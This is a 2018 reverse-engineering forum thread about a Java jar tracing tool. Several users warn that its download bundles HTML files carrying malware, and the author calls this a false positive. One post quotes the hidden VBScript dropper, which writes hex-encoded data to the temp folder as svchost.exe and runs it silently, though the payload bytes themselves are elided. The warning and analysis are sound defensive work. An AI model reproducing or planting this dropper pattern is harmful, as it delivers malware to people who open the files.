Tracer v2

CodeCracker · #1 01-09-2018, 23:19

Tracer v2
Java tracer, this time as a standalone jar,
Just select a Jar and an output text file,
click Trace, and wheel that's it!
classes which start with "java." can't be logged!

Download link:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

Kerlingen · #2 01-11-2018, 01:33

This file contains a VIRUS !!!

No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe"

cybercoder · #3 01-11-2018, 20:33

Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe

--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>

Haven't actually checked out the file that is to be dropped yet.

Zeokat · #4 01-15-2018, 23:28

I could read same report at another forum and CodeCracker replied saying that is a false positive. But... i still have my doubts

CodeCracker · #5 01-17-2018, 04:58

False positive due to some htmls present under jar archive.
If you already runed the jar file don't be alarmed since the html
are not executed, and not even used.
Htmls removed, check:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

sendersu · #6 01-17-2018, 20:56

so who and why the hell added malware html into your archives?

Kerlingen · #7 01-18-2018, 01:26

Quote:

Originally Posted by CodeCracker

False positive

Please, read the definition before stating something obviously wrong:

Quote:

A false positive error, or in short a false positive, commonly called a "false alarm", is a result that indicates a given condition exists, when it does not.

The fact that the malware doesn't execute just by downloading doesn't make it a false positive.

Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial?

rooster1 · #8 07-17-2018, 01:24

@CodeCracker can this be used for a jar file that is launched with an EXE file?

CodeCracker · #9 07-17-2018, 02:20

Quote:

Originally Posted by rooster1

@CodeCracker can this be used for a jar file that is launched with an EXE file?

No, it can trace only jars currently, the main reason is that it uses asm objectweb to inject trace commands on classes,
You could try JavaClassManager
https://forum.exetools.com/showthread.php?t=18592
to try to save loaded classes.
JavaClassManager can launch both jar and exe extensions,
it is just a matter of intercepting class loading and editing classes to do what you want.

rooster1 · #10 07-17-2018, 03:53

Thanks for the guidance bro. i will try your recommendation

peace

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

The Following 2 Users Say Thank You to CodeCracker For This Useful Post:
niculaita (01-09-2018), wilson bibe (01-10-2018)

The Following 6 Users Say Thank You to Kerlingen For This Useful Post:
dila (01-12-2018), niculaita (01-11-2018), QuakeGamer (01-15-2018), tonyweb (01-15-2018), Zeokat (01-12-2018), zeuscane (01-12-2018)

The Following 2 Users Say Thank You to CodeCracker For This Useful Post:
niculaita (01-17-2018), yoza (01-24-2018)

The Following 2 Users Gave Reputation+1 to Kerlingen For This Useful Post:
evlncrn8 (01-18-2018), yoza (01-24-2018)

The Following User Says Thank You to Kerlingen For This Useful Post:
Mkz (08-03-2018)

The Following User Says Thank You to CodeCracker For This Useful Post:
niculaita (07-17-2018)